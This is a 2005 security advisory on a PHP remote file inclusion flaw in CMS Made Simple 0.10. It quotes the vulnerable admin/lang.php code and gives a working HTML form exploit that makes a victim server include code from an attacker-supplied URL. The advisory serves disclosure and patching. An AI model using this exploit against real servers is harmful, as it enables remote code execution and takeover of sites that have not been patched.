CMS010.txt

` -- == -- == -- == -- == -- == -- == -- == -- == -- == --  
Name: CMS Made Simple - PHP injection   
Version <= 0.10  
Homepage: http://www.cmsmadesimple.org/  
  
Author: Filip Groszynski (VXSfx)  
Date: 31 August 2005  
-- == -- == -- == -- == -- == -- == -- == -- == -- == --  
  
Background:  
  
CMS Made Simple is an easy to use content managment  
system for simple stable content site. Uses PHP, MySQL  
and Smarty templating system.  
  
--------------------------------------------------------  
  
Vulnerable code exist in ./admin/lang.php:  
  
<?php  
...  
$current_language = "en_US";  
#Only do language stuff for admin pages  
[!] if (isset($CMS_ADMIN_PAGE)) {  
...  
#Check to see if there is already a language in use...  
if (isset($_POST["change_cms_lang"])) {  
[!] $current_language = $_POST["change_cms_lang"];  
setcookie("cms_language", $_POST["change_cms_lang"]);  
} else if (isset($_COOKIE["cms_language"])) {  
$current_language = $_COOKIE["cms_language"];  
}  
else {  
...  
}  
  
#Ok, we have a language to load, let's load it already...  
if (isset($nls['file'][$current_language])) {  
foreach ($nls['file'][$current_language] as $onefile) {  
[!] include($onefile);  
}  
}  
...  
}  
...  
?>  
--------------------------------------------------------  
  
Exploit:  
  
example.html:  
<form action="http://(__VICTIM__)/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][vx][vxsfx]=(__URL__)" method=post>  
<input type=hidden name=change_cms_lang value=vx>  
<input type=submit name=test VALUE="do it">  
</form>  
EOF  
  
--------------------------------------------------------  
  
Contact:  
  
Author: Filip Groszynski (VXSfx)  
Location: Poland <Warsaw>  
Email: groszynskif <|> gmail <|> com  
  
-- == -- == -- == -- == -- == -- == -- == -- == -- == --  
`